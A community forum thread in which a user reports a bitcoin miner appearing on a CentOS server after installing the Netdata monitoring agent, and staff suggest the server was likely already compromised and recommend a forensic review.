Netdata Community

Bitcoin miner installed after I enabled Netdata on a Centos server

How is the install process of the files that go onto a server validated to be virus free? After we installed the necessary files on the Centos 7 server we wanted to test monitor we found that the next day the CPU went to 100% and checking what was running we found a bitcoin miner was now on the server. Killing the process only stops it for 1 day. as the next day it is back again.

This does not give me a lot of faith in the security of you monitoring solution.

Dear John there are (mainly) two alternatives for netdata installation. One is through the binary packages, and the second (probably also your case) is through compiling the agent on the machine it is getting installed. So it is highly unlikely that following the installation process recommended, you could introduce another application through the installation process.

At all cases the installation script is visible on your side, and you can examine it through your security forensic process. Without knowing all details on your case - i would strongly recommend that you proceed with a thorough security forensic process - it seems more likely that by installing netdata agent you actually discovered that CPU is utilized by the bitcoin miner. Lets us know how else we can help on the subject.

Hey @johng and welcome to our community.

I would have really preferred if the welcome was under better circumstances, but that’s life.

Given that Netdata is being download hundreds of thousands of times per day without any relevant incident and that we are a VC-backed company, I think that George’s insight is probably right.

In essence, not only Netdata couldn’t have installed such a miner, but it’s probably the reason you discovered it in the first place.

I am sorry that you have to manage such a security incident and I do hope to root-cause it.

If you need any further help, please don’t hesitate to reach out!

Thanks for the quick response George. We had been manually monitoring this server since we created it over 12 months ago and we did not see any abnormal CPU behavior. But let me do a log check to see what we can find.

Regards
John

Thanks for the welcome @OdysLam . We will do the install analysis and se what we can find.

@johng hi!

After we installed the necessary files on the Centos 7

How did you install Netdata Agent? What are those necessary files?

Hi @ilyam8 we just did the standard install following the netdata guide so what ever files needed to be installed came from there. We did not install any files from our side. I just spoke with the team and they are going to go through the logs. We are installing clamav on the server today as an added precaution.

1 Like